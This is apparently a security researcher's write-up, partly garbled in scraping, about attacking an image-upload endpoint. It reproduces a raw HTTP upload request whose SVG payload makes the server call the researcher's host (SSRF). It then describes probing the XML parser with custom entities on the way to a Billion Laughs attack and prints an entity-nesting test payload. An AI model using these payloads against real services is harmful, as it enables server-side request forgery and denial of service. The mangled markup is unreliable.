

Host: redacted.com

Connection: close

Content-Length: 1313

Accept: application/json, text/javascript, */*; q=0.01

Origin:

X-Requested-With: XMLHttpRequest

User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36

Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryINZ5MzqXAud4aYrN

Referer:

Accept-Encoding: gzip, deflate

Accept-Language: en-US,en;q=0.9 POST /upload HTTP/1.1Host: redacted.comConnection: closeContent-Length: 1313Accept: application/json, text/javascript, */*; q=0.01Origin: https://redacted.com X-Requested-With: XMLHttpRequestUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryINZ5MzqXAud4aYrNReferer: https://redacted.com Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9 ceaa2f2d25275bb5879a726eb8c04aec7b3a64f7

------WebKitFormBoundaryINZ5MzqXAud4aYrN

Content-Disposition: form-data; name="timestamp" 1551244304

------WebKitFormBoundaryINZ5MzqXAud4aYrN

Content-Disposition: form-data; name="api_key" 413781391468673

------WebKitFormBoundaryINZ5MzqXAud4aYrN

Content-Disposition: form-data; name="file"; filename="test.jpg"

Content-Type: image/jpeg http://www.w3.org/2000/svg " xmlns=" http://www.w3.org/2000/svg " xmlns:xlink=" http://www.w3.org/1999/xlink " width="200" height="200"> http://myserver:1337/ " />

Incoming Request at my server: Interestingly referer header shows the request has been generated from an internal network of the application which is hosting app over port 3000

Since the application is accepting SVG based images, the second try would be to include the static entities to see if the parser is allowing custom entities.

As parser is allowing static entities, Next step would be to include SYSTEM based entities along with DTD to fetch the malicious DTD which is more like XXE attack but parser was blocking system based entities in the backend, they had strong validation of the malicious malformed XML.

Since parser is blocking SYSTEM based entities our attack surface has been limited, Now it’s time to test Billion Laughs attack since application allowed static entities. Always note that: Before blinding fuzzing the various XML payloads, make sure to understand the parser logic, Before trying the billion laugh attack, I threw the server with simple callback entity function to see if the parser allows rendering of xml1 entity through callback of xml2 entity.

<?xml version="1.0" encoding="UTF-8" standalone="no"?>

<!DOCTYPE testingxxe [

<!ENTITY xml1 "This is my first message">

<!ENTITY xml2 "&xml1";>

]>

<text x="0" y="20" font-size="20">&xml2;</text>

</svg>